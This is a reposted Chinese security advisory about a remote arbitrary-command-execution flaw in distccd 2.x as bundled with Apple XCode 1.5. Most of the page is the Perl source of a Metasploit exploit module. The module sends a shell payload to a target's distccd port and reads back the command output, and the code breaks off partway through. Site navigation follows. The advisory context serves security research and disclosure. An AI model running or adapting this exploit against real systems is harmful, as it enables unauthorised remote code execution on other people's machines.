XCode 1.5及distcc 2.x可能运行执行任意代码漏洞
2008-04-09 04:24:54来源:互联网 阅读 ()
发布日期:2005-03-10
更新日期:2005-03-11
受影响系统:
Apple XCode 1.5描述:
Samba distcc 2.x
distcc是用于在网络中多个机器间发布C、C 、Objective C或Objective C 代码的程序。
Apple捆绑的XCode 1.5允许分布式编译。这个功能实际上使用的是Samba distcc模块(http://distcc.samba.org)。 现在已有对distccd的攻击,允许远程攻击者以完全的用户级别访问目标机器。
XCode捆绑的是distcc的2.0.1版本。即使升级到2.18.3版本后仍存在类似的问题。
<*来源:Ray Slakinski (rays@sdf1.net)
Jason McLeod (jason@sdf1.net)
H D Moore (sflist@digitaloffense.net)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111047639409069&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::distcc_exec;
use base "Msf::Exploit";
use Pex::Text;
use strict;
my $advanced = { };
my $info =
{
'Name' => 'DistCC Daemon Command Execution',
'Version' => '$Revision: 1.6 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>'],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The distccd server port', 3632],
},
'Payload' => {
'Space' => 1024,
'Keys' => ['cmd', 'cmd_bash'],
},
'Description' => Pex::Text::Freeform(qq{
This module uses a documented security weakness to execute
arbitrary commands on any system running distccd.
}),
'Refs' => [ ['URL', 'http://distcc.samba.org/security.html'], ],
'Keys' => ['distcc'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $shellcode = $self->GetVar('EncodedPayload')->RawPayload;
my ($res, $len);
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $distcmd = $self->DistCommand("sh", "-c", $shellcode);
$s->Send($distcmd);
my $app = "DOTI0000000A"."METASPLOIT\n";
$s->Send($app);
$res = $s->Recv(24, 5);
if (! $res || length($res) != 24) {
$self->PrintLine("[*] The remote distccd did not reply to our request");
return;
}
# Check STDERR
$res = $s->Recv(4, 5);
$res = $s->Recv(8, 5);
$len = unpack('N', pack('H*', $res));
if ($len) {
$res = $s->Recv($len, 5);
foreach (split(/\n/, $res)) {
$self->PrintLine("stderr: $_");
}
}
# Check STDOUT
$res = $s->Recv(4, 5);
$res = $s->Recv(8, 5);
$len = unpack('N', pack('H*', $res));
if ($len) {
$res = $s->Recv($len, 5);
foreach (split(/\n/, $res)) {
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
